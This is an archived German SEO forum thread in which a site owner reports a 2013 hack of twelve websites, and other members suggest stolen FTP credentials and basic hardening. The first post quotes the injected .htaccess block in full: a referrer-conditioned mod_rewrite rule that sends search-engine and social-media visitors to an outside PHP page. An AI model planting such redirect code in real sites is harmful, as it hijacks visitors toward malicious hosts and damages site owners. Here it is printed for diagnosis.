Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Hacker-Angriff ??!!

Hier können Sie Ihre Fragen zum Thema Suchmaschinenoptimierung (SEO) / Positionierung stellen
MaxxWald
PostRank 3
PostRank 3
Beiträge: 72
Registriert: 18.01.2008, 14:02

Beitrag von MaxxWald » 05.01.2013, 12:50

Unsere Webseiten wurden am 02.01.2013 Ziel eines Hackerangriffs, wobei ein Code in insgesamt 12 Webseiten hinterlegt wurde. Hier ist der Code:

#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ xxx.andreasfleiss.com/dtd.php [R=301,L]
</IfModule>

#/336988#

Der Code wurde jeweils in die htaccess eingebaut, wobei dann eine Weiterleitung auf die xxx.andreasfleiss.com/dtd.php (geändert in xxx, sonst www) bestand. Bei Aufruf der Seiten wurden diese dann auf die Domain weitergeleitet.

Fragen:
- Wer hat ähnliches erlebt?
- Wie geht sowas? FTP-Zugang geknackt?
- Alle Seiten bei 1und1 gehostet? Erfolgte dort der Angriff?
- Was soll das ganze?

Anzeige von ABAKUS

von Anzeige von ABAKUS »

Content Erstellung von ABAKUS Internet Marketing
Ihre Vorteile:
  • einzigartige Texte
  • suchmaschinenoptimierte Inhalte
  • eine sinnvolle Content-Strategie
  • Beratung und Umsetzung
Jetzt anfragen: 0511 / 300325-0

MonikaTS
PostRank 10
PostRank 10
Beiträge: 3582
Registriert: 07.10.2005, 09:05

Beitrag von MonikaTS » 05.01.2013, 13:01

was das ganze soll wissen die, die es taten,
wie sie reingekommen sind ist in den Serverlogs nachzuverfolgen
zu90% gehen die meist über den FTP rein,
einfach sichere Verbindungen nutzen, Passwörter regelmäßigst ändern und ein FTP nutzen, dass die Passwörter nicht im Klartext speichert

todo
PostRank 9
PostRank 9
Beiträge: 2499
Registriert: 17.07.2008, 11:46
Wohnort: Bielefeld

Beitrag von todo » 05.01.2013, 13:11

Filezilla genutzt?